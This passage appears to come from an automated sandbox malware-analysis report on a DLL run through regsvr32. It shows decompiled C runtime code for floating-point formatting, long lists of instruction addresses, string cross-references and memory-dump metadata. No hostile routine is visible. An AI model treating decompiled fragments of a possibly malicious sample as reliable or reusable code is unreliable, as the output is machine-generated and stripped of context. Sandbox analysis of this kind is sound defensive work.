												_t1214 = _v1916;
												__eflags = _t1127 - _t1214;
												if(_t1127 >= _t1214) {
													 *(_t1214 + _t1256) = _t874;
												} else {
													__eflags = _t874 - 0x30;
													_t1111 = _t1111 & (_t874 & 0xffffff00 | _t874 != 0x00000030) - 0x00000001;
												}
												_t871 = _v1920;
												_t1202 = _t1214 - 1;
												_v1916 = _t1202;
												__eflags = _t1202 - 0xffffffff;
											} while (_t1202 != 0xffffffff);
											__eflags = _t1127 - 9;
											if(_t1127 > 9) {
												_t1127 = 9;
											}
											_t1254 = _t1256 + _t1127;
											_v1868 = _t1254;
											__eflags = _t1254 - _v1872;
											if(_t1254 != _v1872) {
												continue;
											}
											goto L302;
										}
									}
									L302:
									 *_t1254 = 0;
									__eflags = _t1111;
									_t864 = 0 | __eflags != 0x00000000;
									_v1884 = _t864;
									_t1111 = _t864;
									goto L308;
								}
							}
						}
					}
				} else {
					_t1127 = _t1288 & 0x000fffff;
					if((_a4 | _t1288 & 0x000fffff) == 0 || (_v1944 & 0x01000000) != 0) {
						_push(0x6e4713a4);
						 *((intOrPtr*)(_v1928 + 4)) =  *(_v1928 + 4) & 0x00000000;
						L12:
						_push(_a24);
						_push(_v1896);
						if(E6E460381() != 0) {
							L311:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6E45D669();
							asm("int3");
							return E6E46901A(E6E46903C(__eflags));
						} else {
							L308:
							_t1331 = _v1932;
							_pop(_t1247);
							_pop(_t1289);
							if(_v1932 != 0) {
								E6E468A30(_t1127, _t1331,  &_v1940);
							}
							_pop(_t1112);
							return E6E45AF4F(_t1111, _t1112, _v8 ^ _t1313, _t1202, _t1247, _t1289);
						}
					} else {
						goto L14;
					}
				}
			}

0x6e4662fa
0x6e4662fa
0x6e4662fa
0x6e4662fd
0x6e4662ff
0x6e466305
0x6e46630c
0x6e466312
0x6e46631b
0x6e466327
0x6e466329
0x6e466339
0x6e46633d
0x6e46634f
0x6e466355
0x6e46633f
0x6e46633f
0x6e46633f
0x6e46635b
0x6e46635c
0x6e46635f
0x6e466362
0x6e466363
0x6e466365
0x6e466374
0x6e46636f
0x6e466371
0x6e466371
0x6e466376
0x6e466380
0x6e466388
0x6e466392
0x6e4663a1
0x6e4663a6
0x6e4663f0
0x6e4663f4
0x6e4663f9
0x6e4663fa
0x6e4663fc
0x6e4663fe
0x6e466404
0x6e466404
0x6e466407
0x6e466407
0x6e46640a
0x6e4677bf
0x6e4677c7
0x6e4677c9
0x00000000
0x6e4677cb
0x6e4677cb
0x6e4677cb
0x00000000
0x6e4677cb
0x6e466410
0x6e466410
0x6e466410
0x6e466413
0x6e4677a7
0x00000000
0x6e466419
0x6e466419
0x6e466419
0x6e46641c
0x6e46779d
0x00000000
0x6e466422
0x6e466422
0x6e466425
0x6e467793
0x00000000
0x6e46642b
0x6e466434
0x6e466441
0x6e466445
0x6e466448
0x6e46644e
0x6e466456
0x6e46645c
0x6e466466
0x6e466466
0x6e466469
0x6e466475
0x6e466477
0x6e46647c
0x6e46647c
0x6e46647c
0x6e46646b
0x6e46646b
0x6e46646d
0x6e46646d
0x6e466488
0x6e466496
0x6e46649c
0x6e46649e
0x6e4664a6
0x6e4664ac
0x6e4664b1
0x6e4664b3
0x6e4664b6
0x6e4664bc
0x6e4664bd
0x6e4664c2
0x6e4664ca
0x6e4664cb
0x6e4664d0
0x6e4664d9
0x6e4664d9
0x6e4664db
0x6e4664d2
0x6e4664d2
0x6e4664d7
0x00000000
0x00000000
0x6e4664d7
0x6e4664e1
0x6e4664ef
0x6e4664f1
0x6e4664fa
0x6e466500
0x6e466501
0x6e466507
0x6e46650d
0x6e466513
0x6e4668b2
0x6e4668b5
0x6e4669cf
0x6e4669d1
0x6e4669d6
0x6e4669d6
0x6e4669d6
0x6e4669e4
0x6e4669eb
0x6e4669ee
0x6e4669f3
0x6e4669f3
0x6e4669f0
0x6e4669f0
0x6e4669f0
0x6e4669f7
0x6e4669f9
0x6e4669fd
0x6e4669ff
0x6e466a02
0x6e466a31
0x6e466a34
0x6e466a37
0x6e466a39
0x6e466a3c
0x6e466a3c
0x6e466a3e
0x6e466a49
0x6e466a49
0x6e466a40
0x6e466a40
0x6e466a40
0x6e466a4b
0x6e466a4d
0x6e466a58
0x6e466a58
0x6e466a4f
0x6e466a4f
0x6e466a4f
0x6e466a61
0x6e466a68
0x6e466a69
0x6e466a6a
0x6e466a6d
0x00000000
0x00000000
0x6e466a6f
0x6e466a6f
0x6e466a3c
0x6e466a77
0x6e466a77
0x6e466a04
0x6e466a04
0x6e466a11
0x6e466a27
0x6e466a2c
0x6e466a2c
0x6e466a90
0x6e466a9c
0x6e466aa9
0x6e466aab
0x6e4668bb
0x6e4668bb
0x6e4668c2
0x6e4668cc
0x6e4668d6
0x6e4668d8
0x6e4668de
0x6e4668de
0x6e4668e0
0x6e4668e0
0x6e4668e7
0x6e4668ee
0x00000000
0x00000000
0x6e4668f4
0x6e4668f7
0x6e4668fa
0x00000000
0x6e4668fc
0x6e4668fc
0x6e4668fe
0x6e466901
0x6e466907
0x6e46690c
0x6e466909
0x6e466909
0x6e466909
0x6e466910
0x6e466913
0x6e466917
0x6e466919
0x6e46691c
0x6e466948
0x6e46694b
0x6e46694e
0x6e466950
0x6e466953
0x6e466953
0x6e466955
0x6e466960
0x6e466957
0x6e466957
0x6e466957
0x6e466962
0x6e466964
0x6e46696f
0x6e466966
0x6e466966
0x6e466966
0x6e466979
0x6e466980
0x6e466981
0x6e466982
0x6e466985
0x00000000
0x00000000
0x6e466987
0x6e466987
0x6e466953
0x6e46698f
0x6e46698f
0x6e46691e
0x6e466925
0x6e466932
0x6e46693e
0x6e466943
0x6e466943
0x6e4669a8
0x6e4669b4
0x6e4669c3
0x6e4669c3
0x00000000
0x6e4668fa
0x6e4668e0
0x00000000
0x6e4668d8
0x6e466ab2
0x6e466ab2
0x6e466ab5
0x6e466aba
0x6e466ac0
0x6e466ad9
0x6e466ae0
0x6e466ae3
0x6e466ae3
0x6e466519
0x6e466519
0x6e466520
0x6e46652a
0x6e466534
0x6e466536
0x6e46671a
0x6e46671a
0x6e466726
0x6e46672e
0x6e466734
0x6e46673e
0x6e466744
0x6e466749
0x6e46674f
0x6e466750
0x6e466750
0x6e466750
0x6e466757
0x6e46675d
0x6e46675f
0x6e46676c
0x6e46676f
0x6e46677a
0x6e46677a
0x6e46677a
0x6e466771
0x6e466772
0x6e466772
0x6e466781
0x6e466787
0x6e46678c
0x6e46678f
0x6e466792
0x6e4667c5
0x6e4667cb
0x6e4667d1
0x6e4667d3
0x6e4667d9
0x6e4667dc
0x00000000
0x6e4667de
0x6e4667de
0x6e4667e1
0x6e4667e2
0x6e4667e8
0x6e4667ee
0x6e4667f0
0x6e4667f8
0x6e4667f8
0x6e466800
0x6e466803
0x6e466809
0x6e466809
0x6e46680b
0x6e466812
0x6e466812
0x6e46680d
0x6e46680d
0x6e46680d
0x6e466814
0x6e46681a
0x6e46681d
0x6e46681f
0x6e466825
0x6e466825
0x6e466821
0x6e466821
0x6e466821
0x6e466849
0x6e466851
0x6e466860
0x6e466861
0x6e466864
0x6e46686a
0x6e46686b
0x6e466871
0x6e466877
0x00000000
0x00000000
0x6e466879
0x6e466879
0x6e466881
0x6e466881
0x6e466887
0x6e466889
0x6e46688b
0x6e466893
0x6e466893
0x6e466893
0x6e46689b
0x6e46689b
0x6e466794
0x6e466794
0x6e466797
0x6e46679d
0x6e4667b2
0x6e4667b7
0x6e4667b7
0x6e4668a1
0x6e4668ab
0x6e46653c
0x6e46653c
0x6e46653c
0x6e46653e
0x6e466545
0x6e46654c
0x00000000
0x00000000
0x6e466552
0x6e466555
0x6e466558
0x00000000
0x6e46655a
0x6e46655a
0x6e466566
0x6e46656e
0x6e466574
0x6e46657e
0x6e466584
0x6e466589
0x6e46658f
0x6e466590
0x6e466590
0x6e466590
0x6e466597
0x6e46659d
0x6e46659f
0x6e4665ac
0x6e4665af
0x6e4665ba
0x6e4665ba
0x6e4665ba
0x6e4665b1
0x6e4665b2
0x6e4665b2
0x6e4665c1
0x6e4665c7
0x6e4665cc
0x6e4665cf
0x6e4665d2
0x6e466605
0x6e46660b
0x6e466611
0x6e466613
0x6e466619
0x6e46661c
0x00000000
0x6e46661e
0x6e46661e
0x6e466621
0x6e466622
0x6e466628
0x6e46662e
0x6e466630
0x6e466638
0x6e466638
0x6e466640
0x6e466643
0x6e466649
0x6e466649
0x6e46664b
0x6e466652
0x6e466652
0x6e46664d
0x6e46664d
0x6e46664d
0x6e466654
0x6e46665a
0x6e46665d
0x6e46665f
0x6e466665
0x6e466665
0x6e466661
0x6e466661
0x6e466661
0x6e466689
0x6e466691
0x6e4666a0
0x6e4666a1
0x6e4666a4
0x6e4666aa
0x6e4666ab
0x6e4666b1
0x6e4666b7
0x00000000
0x00000000
0x6e4666b9
0x6e4666b9
0x6e4666c1
0x6e4666c1
0x6e4666c7
0x6e4666c9
0x6e4666cb
0x6e4666d3
0x6e4666d3
0x6e4666d3
0x6e4666db
0x6e4666db
0x6e4665d4
0x6e4665d4
0x6e4665d7
0x6e4665dd
0x6e4665f2
0x6e4665f7
0x6e4665f7
0x6e4666e3
0x6e4666e4
0x6e4666ea
0x6e4666ea
0x00000000
0x6e466558
0x00000000
0x6e46653e
0x6e4666eb
0x6e4666eb
0x6e4666f8
0x6e4666ff
0x6e466705
0x6e466706
0x6e466707
0x6e46670d
0x6e466712
0x6e466712
0x6e466ae4
0x6e466aee
0x6e466aef
0x6e466af5
0x6e466af7
0x6e466fda
0x6e466fdc
0x6e466fde
0x6e466fe4
0x6e466fe6
0x6e466fec
0x6e466fee
0x6e4673bc
0x6e4673bc
0x6e4673be
0x6e4673c4
0x6e4673cb
0x6e4673d1
0x6e4673d3
0x6e467486
0x6e467486
0x6e467488
0x6e467489
0x6e46748f
0x00000000
0x6e4673d9
0x6e4673d9
0x6e4673db
0x6e4673e1
0x6e4673e7
0x6e4673e9
0x6e4673ef
0x6e4673f6
0x6e4673f6
0x6e4673f8
0x6e4673f8
0x6e467405
0x6e46740c
0x6e467412
0x6e467415
0x6e467416
0x6e46741c
0x6e46741c
0x6e467420
0x6e467422
0x6e467428
0x6e46742e
0x6e467431
0x00000000
0x6e467433
0x6e467433
0x6e46743a
0x6e46743a
0x6e467431
0x6e467422
0x6e4673e9
0x6e4673db
0x6e4673d3
0x6e466ff4
0x6e466ff4
0x6e466ff4
0x6e466ff7
0x6e466ffb
0x6e466ffb
0x6e466ffc
0x6e46700e
0x6e46701b
0x6e46702a
0x6e467054
0x6e467059
0x6e46705f
0x6e467062
0x6e467064
0x6e467136
0x6e46713c
0x6e46720a
0x6e467210
0x6e467216
0x6e467216
0x6e467216
0x6e467219
0x6e46721b
0x6e46721b
0x6e467221
0x6e467227
0x6e46722d
0x6e46722f
0x6e467231
0x6e467231
0x6e467237
0x6e46723d
0x6e46723f
0x6e46724b
0x6e467251
0x6e467241
0x6e467241
0x6e467243
0x6e467243
0x6e467257
0x6e467259
0x6e46725b
0x6e46725b
0x6e467261
0x6e467263
0x6e467265
0x6e46726b
0x6e46726d
0x6e46736e
0x6e46736e
0x6e467374
0x6e467379
0x6e467379
0x6e46737c
0x6e46737d
0x00000000
0x6e467273
0x6e467273
0x6e467273
0x6e467277
0x6e467297
0x6e467299
0x6e46729b
0x6e4672a1
0x6e4672a7
0x6e4672a9
0x6e467350
0x6e467350
0x6e467353
0x00000000
0x6e467359
0x6e467359
0x6e46735f
0x00000000
0x6e46735f
0x6e4672af
0x6e4672af
0x6e4672af
0x6e4672b2
0x00000000
0x00000000
0x6e4672b4
0x6e4672b6
0x6e4672be
0x6e4672c7
0x6e4672c7
0x6e4672c9
0x6e4672c9
0x6e4672db
0x6e4672de
0x6e4672e4
0x6e4672ed
0x6e4672f0
0x6e4672fd
0x6e467300
0x6e467301
0x6e467302
0x6e467308
0x6e46730a
0x6e467310
0x6e467316
0x00000000
0x00000000
0x00000000
0x00000000
0x6e467318
0x6e467318
0x6e467318
0x6e46731a
0x00000000
0x00000000
0x6e46731c
0x6e46731f
0x6e467442
0x6e467442
0x00000000
0x6e467325
0x6e467325
0x6e467327
0x6e467329
0x6e467329
0x6e467329
0x6e467331
0x6e467334
0x6e467334
0x6e46733a
0x6e46733c
0x6e46733e
0x6e467345
0x6e46734b
0x6e46734d
0x00000000
0x6e46734d
0x00000000
0x6e46731f
0x00000000
0x6e467318
0x00000000
0x6e4672af
0x6e467279
0x6e467279
0x6e46727b
0x6e467281
0x6e467289
0x6e467289
0x6e46728c
0x6e46728c
0x00000000
0x6e46727b
0x00000000
0x6e467365
0x6e467365
0x6e467366
0x6e467366
0x00000000
0x6e467273
0x6e467142
0x6e467148
0x6e46714d
0x6e46715f
0x6e46716e
0x6e467173
0x6e467179
0x6e46717c
0x6e46717e
0x6e467198
0x6e46719a
0x00000000
0x6e4671a0
0x6e4671a0
0x6e4671a7
0x00000000
0x6e4671ad
0x6e4671b3
0x6e4671b9
0x6e4671bb
0x6e4671bb
0x6e4671bd
0x6e4671bd
0x6e4671c6
0x6e4671cd
0x6e4671d3
0x6e4671d6
0x6e4671d7
0x6e4671d9
0x6e4671d9
0x6e4671e1
0x6e4671e3
0x00000000
0x6e4671e9
0x6e4671e9
0x6e4671ef
0x6e4671f2
0x6e467447
0x6e46744a
0x6e467450
0x6e467465
0x6e46746a
0x6e46746d
0x6e4671f8
0x6e4671f8
0x6e4671ff
0x00000000
0x6e4671ff
0x6e4671f2
0x6e4671e3
0x6e4671a7
0x6e467180
0x6e467180
0x6e467186
0x6e46718c
0x6e46718d
0x6e467383
0x6e467383
0x6e46738a
0x6e46738b
0x6e46738c
0x6e467391
0x6e467394
0x6e467394
0x6e467394
0x6e46717e
0x6e46706a
0x6e46706a
0x6e467070
0x6e467072
0x6e4670aa
0x6e4670ac
0x00000000
0x6e4670ae
0x6e4670ae
0x6e4670b5
0x00000000
0x6e4670b7
0x6e4670bd
0x6e4670bf
0x6e4670c5
0x6e4670c5
0x6e4670c7
0x6e4670c7
0x6e4670c9
0x6e4670d2
0x6e4670d9
0x6e4670dc
0x6e4670dd
0x6e4670df
0x6e4670df
0x6e4670e7
0x6e4670e9
0x00000000
0x6e4670eb
0x6e4670eb
0x6e4670f1
0x6e4670f4
0x6e467108
0x6e46710e
0x6e467127
0x6e46712c
0x6e46712f
0x00000000
0x6e4670f6
0x6e4670f6
0x6e4670fd
0x00000000
0x6e4670fd
0x6e4670f4
0x6e4670e9
0x6e4670b5
0x00000000
0x6e467074
0x6e467074
0x6e467077
0x6e46707d
0x6e467096
0x6e46709b
0x6e46709e
0x6e46709e
0x6e46709e
0x6e4670a0
0x6e4670a0
0x6e4670a0
0x6e467396
0x6e467396
0x6e467398
0x6e467474
0x6e46747b
0x6e467482
0x6e467495
0x6e46749b
0x6e46749c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e46739e
0x6e4673a4
0x6e4673a4
0x6e4673aa
0x6e4673aa
0x6e4673b6
0x00000000
0x6e4673b6
0x6e466afd
0x6e466afd
0x6e466aff
0x6e466b05
0x6e466b07
0x6e466b0d
0x6e466b0f
0x6e466eef
0x6e466eef
0x6e466ef1
0x6e466ef7
0x6e466efe
0x6e466f04
0x6e466f06
0x6e466f6a
0x6e466f6c
0x6e466f72
0x6e466f78
0x6e466f7a
0x6e466f80
0x6e466f87
0x6e466f87
0x6e466f89
0x6e466f89
0x6e466f96
0x6e466f9d
0x6e466fa3
0x6e466fa6
0x6e466fa7
0x6e466fad
0x6e466fad
0x6e466fb1
0x6e466fb3
0x6e466fb9
0x6e466fbf
0x6e466fc2
0x00000000
0x6e466fc8
0x6e466fc8
0x6e466fcf
0x6e466fcf
0x6e466fc2
0x6e466fb3
0x6e466f7a
0x6e466f08
0x6e466f08
0x6e466f0a
0x6e466f10
0x6e466f16
0x00000000
0x6e466f16
0x6e466f06
0x6e466b15
0x6e466b15
0x6e466b15
0x6e466b18
0x6e466b1c
0x6e466b1c
0x6e466b1d
0x6e466b2f
0x6e466b3c
0x6e466b4b
0x6e466b75
0x6e466b7a
0x6e466b80
0x6e466b83
0x6e466b85
0x6e466c57
0x6e466c5d
0x6e466d41
0x6e466d47
0x6e466d4d
0x6e466d4d
0x6e466d4d
0x6e466d50
0x6e466d52
0x6e466d52
0x6e466d58
0x6e466d5e
0x6e466d64
0x6e466d66
0x6e466d68
0x6e466d68
0x6e466d6e
0x6e466d74
0x6e466d76
0x6e466d82
0x6e466d88
0x6e466d78
0x6e466d78
0x6e466d7a
0x6e466d7a
0x6e466d8e
0x6e466d90
0x6e466d92
0x6e466d92
0x6e466d98
0x6e466d9a
0x6e466d9c
0x6e466da2
0x6e466da4
0x6e466ea5
0x6e466ea5
0x6e466eab
0x6e466eb0
0x6e466eb0
0x6e466eb3
0x6e466eb4
0x00000000
0x6e466daa
0x6e466daa
0x6e466daa
0x6e466dae
0x6e466dce
0x6e466dd0
0x6e466dd2
0x6e466dd8
0x6e466dde
0x6e466de0
0x6e466e87
0x6e466e87
0x6e466e8a
0x00000000
0x6e466e90
0x6e466e90
0x6e466e96
0x00000000
0x6e466e96
0x6e466de6
0x6e466de6
0x6e466de6
0x6e466de9
0x00000000
0x00000000
0x6e466deb
0x6e466ded
0x6e466df5
0x6e466dfe
0x6e466dfe
0x6e466e00
0x6e466e00
0x6e466e12
0x6e466e15
0x6e466e1b
0x6e466e24
0x6e466e27
0x6e466e34
0x6e466e37
0x6e466e38
0x6e466e39
0x6e466e3f
0x6e466e41
0x6e466e47
0x6e466e4d
0x00000000
0x00000000
0x00000000
0x00000000
0x6e466e4f
0x6e466e4f
0x6e466e4f
0x6e466e51
0x00000000
0x00000000
0x6e466e53
0x6e466e56
0x6e466f19
0x6e466f19
0x6e466f1b
0x6e466f20
0x6e466f26
0x6e466f2c
0x6e466f2d
0x00000000
0x6e466e5c
0x6e466e5c
0x6e466e5e
0x6e466e60
0x6e466e60
0x6e466e60
0x6e466e68
0x6e466e6b
0x6e466e6b
0x6e466e71
0x6e466e73
0x6e466e75
0x6e466e7c
0x6e466e82
0x6e466e84
0x00000000
0x6e466e84
0x00000000
0x6e466e56
0x00000000
0x6e466e4f
0x00000000
0x6e466de6
0x6e466db0
0x6e466db0
0x6e466db2
0x6e466db8
0x6e466dc0
0x6e466dc0
0x6e466dc3
0x6e466dc3
0x00000000
0x6e466db2
0x00000000
0x6e466e9c
0x6e466e9c
0x6e466e9d
0x6e466e9d
0x00000000
0x6e466daa
0x6e466c63
0x6e466c69
0x6e466c6e
0x6e466c80
0x6e466c8f
0x6e466c94
0x6e466c9a
0x6e466c9d
0x6e466c9f
0x6e466cb9
0x6e466cbb
0x00000000
0x6e466cc1
0x6e466cc1
0x6e466cc8
0x00000000
0x6e466cce
0x6e466cd4
0x6e466cda
0x6e466cdc
0x6e466cdc
0x6e466cde
0x6e466cde
0x6e466ce7
0x6e466cee
0x6e466cf4
0x6e466cf7
0x6e466cf8
0x6e466cfa
0x6e466cfa
0x6e466d02
0x6e466d04
0x00000000
0x6e466d0a
0x6e466d0a
0x6e466d10
0x6e466d13
0x6e466d29
0x6e466d2f
0x6e466d35
0x6e466d36
0x6e466f33
0x6e466f33
0x6e466f3a
0x6e466f3b
0x6e466f3c
0x6e466f41
0x6e466f44
0x6e466d15
0x6e466d15
0x6e466d1c
0x00000000
0x6e466d1c
0x6e466d13
0x6e466d04
0x6e466cc8
0x6e466ca1
0x6e466ca1
0x6e466ca7
0x6e466cad
0x6e466cae
0x6e466eba
0x6e466eba
0x6e466ec1
0x6e466ec2
0x6e466ec3
0x6e466ec8
0x6e466ecb
0x6e466ecb
0x6e466ecb
0x6e466c9f
0x6e466b8b
0x6e466b8b
0x6e466b91
0x6e466b93
0x6e466bcb
0x6e466bcd
0x00000000
0x6e466bcf
0x6e466bcf
0x6e466bd6
0x00000000
0x6e466bd8
0x6e466bde
0x6e466be0
0x6e466be6
0x6e466be6
0x6e466be8
0x6e466be8
0x6e466bea
0x6e466bf3
0x6e466bfa
0x6e466bfd
0x6e466bfe
0x6e466c00
0x6e466c00
0x6e466c08
0x6e466c0a
0x00000000
0x6e466c0c
0x6e466c0c
0x6e466c12
0x6e466c15
0x6e466c29
0x6e466c2f
0x6e466c48
0x6e466c4d
0x6e466c50
0x00000000
0x6e466c17
0x6e466c17
0x6e466c1e
0x00000000
0x6e466c1e
0x6e466c15
0x6e466c0a
0x6e466bd6
0x00000000
0x6e466b95
0x6e466b95
0x6e466b98
0x6e466b9e
0x6e466bb7
0x6e466bbc
0x6e466bbf
0x6e466bbf
0x6e466bbf
0x6e466bc1
0x6e466bc1
0x6e466bc1
0x6e466ecd
0x6e466ecd
0x6e466ecf
0x6e466f48
0x6e466f4f
0x6e466f4f
0x6e466f4f
0x6e466f56
0x6e466f58
0x6e466f5e
0x6e466f5f
0x6e4674a2
0x6e4674a2
0x6e4674a3
0x6e4674a4
0x6e4674a9
0x00000000
0x00000000
0x00000000
0x00000000
0x6e466ed1
0x6e466ed7
0x6e466ed7
0x6e466edd
0x6e466edd
0x6e466ee9
0x00000000
0x6e466ee9
0x6e466b0f
0x6e4674ac
0x6e4674ac
0x6e4674b2
0x6e4674b8
0x6e4674be
0x6e4674c0
0x6e4674c2
0x6e4674c9
0x6e4674c9
0x6e4674cb
0x6e4674cb
0x6e4674d4
0x6e4674d5
0x6e4674dd
0x6e4674e4
0x6e4674e7
0x6e4674e8
0x6e4674ee
0x6e4674ee
0x6e4674f2
0x6e4674f8
0x6e4674fa
0x6e4674fc
0x6e467502
0x6e467505
0x6e467516
0x6e467519
0x6e46751f
0x6e467534
0x6e467539
0x6e467507
0x6e467507
0x6e46750e
0x6e46750e
0x6e467505
0x6e4674fa
0x6e46754a
0x6e467551
0x6e467559
0x6e46755a
0x6e46755c
0x6e4676a8
0x6e4676aa
0x6e4676ba
0x6e4676bd
0x6e4676bf
0x00000000
0x6e4676ac
0x6e4676b2
0x00000000
0x6e4676b2
0x00000000
0x6e467562
0x6e467562
0x6e467568
0x6e46756b
0x6e467571
0x6e467574
0x6e46757a
0x6e467580
0x6e467582
0x6e467584
0x6e467586
0x6e467586
0x6e467588
0x6e467588
0x6e467595
0x6e46759c
0x6e46759f
0x6e4675a0
0x6e4675a2
0x6e4675a3
0x6e4675a3
0x6e4675ab
0x6e4675b1
0x6e4675b3
0x6e4675b9
0x6e4675bb
0x6e4675c1
0x6e4675c4
0x6e467680
0x6e467686
0x6e46769b
0x6e4676a0
0x6e4675ca
0x6e4675d0
0x6e4675d7
0x6e4675d7
0x6e4675d7
0x6e4675d7
0x6e4675c4
0x6e4675dd
0x6e4675dd
0x6e4675e3
0x6e4675e3
0x6e4675e3
0x6e4675e9
0x6e4675ef
0x6e4675f2
0x6e4675f8
0x6e4675fa
0x6e4675fc
0x6e467602
0x6e467604
0x6e467604
0x6e467604
0x6e467602
0x6e467609
0x6e46760a
0x6e46760c
0x6e46760e
0x6e46760e
0x6e467610
0x6e467612
0x6e467618
0x6e46761a
0x6e467620
0x6e467620
0x6e467626
0x6e467628
0x00000000
0x00000000
0x6e46762e
0x6e467630
0x6e467632
0x6e467632
0x6e467634
0x6e467634
0x6e467644
0x6e46764b
0x6e46764e
0x6e46764f
0x6e467651
0x6e467651
0x6e467655
0x6e46765b
0x6e46765d
0x6e467663
0x6e467669
0x6e46766c
0x6e4676ca
0x6e4676cd
0x6e4676d3
0x6e4676e8
0x6e4676ed
0x6e46766e
0x6e46766e
0x6e467675
0x6e467675
0x6e46766c
0x6e4676fe
0x6e467703
0x6e467712
0x6e467715
0x6e46771f
0x6e46771f
0x6e467721
0x6e467723
0x6e467729
0x6e467731
0x6e467737
0x6e467739
0x6e46773f
0x6e467741
0x6e46774e
0x6e467743
0x6e467743
0x6e46774a
0x6e46774a
0x6e467751
0x6e467757
0x6e467758
0x6e46775e
0x6e46775e
0x6e467763
0x6e467766
0x6e46776a
0x6e46776a
0x6e46776b
0x6e46776d
0x6e467773
0x6e467779
0x00000000
0x00000000
0x00000000
0x6e467779
0x6e467620
0x6e46777f
0x6e467781
0x6e467784
0x6e467786
0x6e467789
0x6e46778f
0x00000000
0x6e46778f
0x6e466425
0x6e46641c
0x6e466413
0x6e4663a8
0x6e4663ad
0x6e4663b5
0x6e4663c9
0x6e4663ce
0x6e4663d2
0x6e4663d2
0x6e4663d5
0x6e4663e5
0x6e4677f4
0x6e4677f6
0x6e4677f7
0x6e4677f8
0x6e4677f9
0x6e4677fa
0x6e4677fb
0x6e467800
0x6e46780d
0x6e4663eb
0x6e4677cd
0x6e4677cd
0x6e4677d4
0x6e4677d5
0x6e4677d6
0x6e4677df
0x6e4677e4
0x6e4677ec
0x6e4677f3
0x6e4677f3
0x00000000
0x00000000
0x00000000
0x6e4663b5

APIs

__floor_pentium4.LIBCMT ref: 6E4664B6

Strings

1#INF, xrefs: 6E4677B1
1#SNAN, xrefs: 6E46779D
1#IND, xrefs: 6E467793
1#QNAN, xrefs: 6E4677A7

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a1dc0218cae3356090d009875c952970cdce74f2d56044df009b1b287c118426
Instruction ID: 4b5f3e469b4a6c1331fd979851cc902a94120c9b76d7604dd4a2e544e35afb92
Opcode Fuzzy Hash: a1dc0218cae3356090d009875c952970cdce74f2d56044df009b1b287c118426
Instruction Fuzzy Hash: 03D24A71E182298FDB64CF68CD44BDAB7B9EB85305F1445EBD40DE6240E778AE818F81

Uniqueness

Uniqueness Score: -1.00%

Function 6E458C50 Relevance: 7.7, Strings: 5, Instructions: 1435COMMON

Download Yara Rule

Strings

Mb=L, xrefs: 6E459B71
g, xrefs: 6E4594AF
PT%dM, xrefs: 6E4597F8
@, xrefs: 6E459825
/, xrefs: 6E459623

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID: /$@$Mb=L$PT%dM$g
API String ID: 0-1754906133
Opcode ID: 61e464cc80d1ed131e5f0a4a135c691ce84e4202b0f2f40760f8977af11a2b26
Instruction ID: ff1aa8fece84220595587a9726e34b063aa2d5a9513f49ca9dc852f4f64d9daf
Opcode Fuzzy Hash: 61e464cc80d1ed131e5f0a4a135c691ce84e4202b0f2f40760f8977af11a2b26
Instruction Fuzzy Hash: A4E2F4B4A01228DFDB14CFA8C894BEEB7B1BF49304F1081AAD549AB391D7759E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E465E60 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E6E465E60(signed int* _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t190;
				signed int _t191;
				intOrPtr _t192;
				signed int _t195;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t204;
				signed int _t210;
				intOrPtr _t216;
				void* _t219;
				signed int _t221;
				signed int _t232;
				void* _t236;
				signed int _t239;
				signed int* _t244;
				signed int _t245;
				signed int* _t246;
				signed int* _t247;
				signed int _t249;
				signed int _t250;
				void* _t251;
				intOrPtr* _t252;
				signed int _t253;
				unsigned int _t254;
				signed int _t256;
				signed int* _t260;
				signed int _t261;
				signed int _t262;
				intOrPtr _t264;
				void* _t268;
				signed char _t274;
				signed int* _t277;
				signed int _t281;
				signed int* _t282;
				intOrPtr* _t289;
				signed int _t291;
				signed int _t292;
				signed int* _t295;
				signed int _t296;
				signed int _t298;
				intOrPtr* _t299;
				signed int _t303;
				signed int _t304;
				signed int _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				void* _t315;
				signed int _t316;
				signed int _t319;
				signed int _t323;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t329;
				signed int _t334;
				signed int _t341;
				signed int* _t342;

				_t244 = _a4;
				_t325 =  *_t244;
				if(_t325 == 0) {
					L74:
					__eflags = 0;
					return 0;
				} else {
					_t2 =  &_a8; // 0x6e46754f
					_t289 =  *_t2;
					_t190 =  *_t289;
					_v56 = _t190;
					if(_t190 == 0) {
						goto L74;
					} else {
						_t312 = _t190 - 1;
